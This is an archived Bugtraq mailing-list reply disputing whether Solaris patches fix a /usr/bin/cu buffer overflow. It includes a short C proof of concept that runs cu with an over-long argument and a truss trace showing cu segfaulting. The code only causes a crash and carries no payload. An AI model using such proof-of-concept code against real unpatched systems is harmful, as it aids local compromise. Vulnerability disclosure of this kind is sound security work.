Re: Solaris /usr/bin/cu Vulnerability
From: Dan Harkless <dan-bugtraq () DILVISH SPEED NET>
Date: Tue, 30 Jan 2001 21:18:32 -0800
optyx <optyx () UBERHAX0R NET> writes:
Dan Harkless <dan-bugtraq () DILVISH SPEED NET> wrote: Are you implying the above patches fix the cu long hardlink name vulnerability? This is not the case, at least on 2.6: # cat > cu_exploit.c #include <stdio.h> void main(int argc,char **argv) { char *buf; buf = (char *) malloc(atoi(argv[1])*sizeof(char)); memset(buf,0x41,atoi(argv[1])-1); buf[atoi(argv[1])-1]=0; execl("/usr/bin/cu",buf,(char *)0); } # gcc cu_exploit.c cu_exploit.c: In function `main': cu_exploit.c:4: warning: return type of `main' is not `int' # a.out Segmentation fault
see that atoi(argv[1])? a.out was run with no argument, so argv[1] is NULL there: a.out crashed, not /usr/bin/cu. try a.out 4000 or whatever number next time, or trace through it with gdb.
Right, sorry. I had the 4000 (actually 40000 -- didn't crash with only 4000) in there when I was running it originally but forgot to include it in my proof-of-concept session. Here's the correct version (ellipsis in the Usage and \-line-wrapping mine): # a.out 4000 Usage: AAA[...]AAA [-dhtnLC] [-c device] [-s speed] [-l line] [-b 7|8] [-o | -e] telno | systemname [local-cmd] # a.out 40000 Segmentation Fault # truss a.out 40000 execve("./a.out", 0xEFFFFC98, 0xEFFFFCA4) argc = 2 open("/dev/zero", O_RDONLY) = 3 mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\ 0) = 0xEF7B0000 stat("a.out", 0xEFFFF998) = 0 open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT open("/usr/local/lib/libc.so.1", O_RDONLY) Err#2 ENOENT open("/usr/lib/libc.so.1", O_RDONLY) = 4 fstat(4, 0xEFFFF734) = 0 mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF7A0000 mmap(0x00000000, 704512, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF6C0000 mmap(0xEF763000, 25888, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 4, 602112) = 0xEF763000 mmap(0xEF76A000, 4144, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF76A000 munmap(0xEF754000, 61440) = 0 memcntl(0xEF6C0000, 101660, MC_ADVISE, 0x0003, 0, 0) = 0 close(4) = 0 open("/usr/local/lib/libdl.so.1", O_RDONLY) Err#2 ENOENT open("/usr/lib/libdl.so.1", O_RDONLY) = 4 fstat(4, 0xEFFFF734) = 0 mmap(0xEF7A0000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\ = 0xEF7A0000 close(4) = 0 open("/usr/platform/SUNW,SPARCstation-5/lib/libc_psr.so.1", O_RDONLY)\ Err#2 ENOENT close(3) = 0 brk(0x00020BA0) = 0 brk(0x0002ABA0) = 0 execve("/usr/bin/cu", 0xEFFFFBB8, 0xEFFFFCB0) argc = 1 open("/dev/zero", O_RDONLY) = 3 mmap(0x00000000, 40960, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\ 0) = 0xEF7B0000 stat("/usr/bin/cu", 0xEFFF5D60) = 0 open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\ 0) = 0xEF7A0000 
open("/usr/local/lib/libnsl.so.1", O_RDONLY) Err#2 ENOENT open("/usr/lib/libnsl.so.1", O_RDONLY) = 4 fstat(4, 0xEFFF5AFC) = 0 mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF790000 mmap(0x00000000, 581632, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF700000 mmap(0xEF780000, 32812, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 4, 458752) = 0xEF780000 mmap(0xEF789000, 19976, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF789000 munmap(0xEF771000, 61440) = 0 memcntl(0xEF700000, 70140, MC_ADVISE, 0x0003, 0, 0) = 0 close(4) = 0 open("/usr/local/lib/libsocket.so.1", O_RDONLY) Err#2 ENOENT open("/usr/lib/libsocket.so.1", O_RDONLY) = 4 fstat(4, 0xEFFF5AFC) = 0 mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\ = 0xEF790000 mmap(0x00000000, 102400, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF6E0000 mmap(0xEF6F7000, 4089, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xEF6F7000 mmap(0xEF6F8000, 388, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF6F8000 munmap(0xEF6E8000, 61440) = 0 memcntl(0xEF6E0000, 12072, MC_ADVISE, 0x0003, 0, 0) = 0 close(4) = 0 open("/usr/local/lib/libc.so.1", O_RDONLY) Err#2 ENOENT open("/usr/lib/libc.so.1", O_RDONLY) = 4 fstat(4, 0xEFFF5AFC) = 0 mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\ = 0xEF790000 mmap(0x00000000, 704512, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF600000 mmap(0xEF6A3000, 25888, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 4, 602112) = 0xEF6A3000 mmap(0xEF6AA000, 4144, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF6AA000 munmap(0xEF694000, 61440) = 0 memcntl(0xEF600000, 101660, MC_ADVISE, 0x0003, 0, 0) = 0 close(4) = 0 open("/usr/local/lib/libdl.so.1", O_RDONLY) Err#2 ENOENT open("/usr/lib/libdl.so.1", O_RDONLY) = 4 fstat(4, 0xEFFF5AFC) = 0 mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\ = 0xEF790000 close(4) = 0 
open("/usr/local/lib/libmp.so.2", O_RDONLY) Err#2 ENOENT open("/usr/lib/libmp.so.2", O_RDONLY) = 4 fstat(4, 0xEFFF5AFC) = 0 mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xEF6D0000 mmap(0x00000000, 77824, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF5E0000 mmap(0xEF5F2000, 3581, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xEF5F2000 munmap(0xEF5E3000, 61440) = 0 memcntl(0xEF5E0000, 3020, MC_ADVISE, 0x0003, 0, 0) = 0 close(4) = 0 mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\ 0) = 0xEF6C0000 open("/usr/platform/SUNW,SPARCstation-5/lib/libc_psr.so.1", O_RDONLY)\ Err#2 ENOENT close(3) = 0 munmap(0xEF6D0000, 4096) = 0 Incurred fault #6, FLTBOUNDS %pc = 0xEF624694 siginfo: SIGSEGV SEGV_MAPERR addr=0x00038000 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x00038000 *** process killed *** As you can see, exec() has passed control over to /usr/bin/cu when we seg fault: the fault comes after the second execve(), so it is cu itself, started with the over-long string as its argv[0] (the only argument, hence argc = 1), that crashes. ---------------------------------------------------------------------- Dan Harkless | To prevent SPAM contamination, please dan-bugtraq () dilvish speed net | do not mention this private email SpeedGate Communications, Inc. | address in Usenet posts. Thank you.